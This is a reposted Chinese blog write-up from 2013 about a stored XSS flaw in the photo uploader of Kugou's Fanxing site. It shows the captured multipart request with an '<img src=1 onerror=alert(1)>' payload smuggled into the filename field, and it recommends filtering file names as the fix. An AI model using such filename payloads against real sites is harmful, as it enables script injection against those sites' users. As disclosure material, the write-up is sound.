记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

酷狗旗下分站持久型XSS跨站攻击

2013-08-23 14:35
这个漏洞在酷狗旗下的繁星网:
 
 
fanxing.kugou.com
 
情景再现:
 
 

情况分析:
 
 
 
 
繁星网相册处因为对上传的文件名没有做很好的过滤,我们只要开启抓包软件
 
看到提交的数据是:
 
 
-----------------------------234891716625512\r\nContent-Disposition: form-data; name="photo"; filename="aaaaaaaaa.jpg"\r\nContent-Type: image/jpeg\r\n\r\nÿØÿà
 
在提交的文件名内插入XSS代码,那我们提交的数据就应该是:
 
 
-----------------------------234891716625512\r\nContent-Disposition: form-data; name="photo"; filename="aaaaaaaaa<img src=1 onerror=alert(1)>.jpg"\r\nContent-Type: image/jpeg\r\n\r\nÿØÿà
 
上传成功以后就可以进行XSS跨站攻击了! 
 
 
修复方案:

对文件名进行过滤 
 
知识来源: www.2cto.com/Article/201308/238447.html

阅读:88758 | 评论:0 | 标签:xss 跨站

想收藏或者和大家分享这篇好文章→复制链接地址

“酷狗旗下分站持久型XSS跨站攻击”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云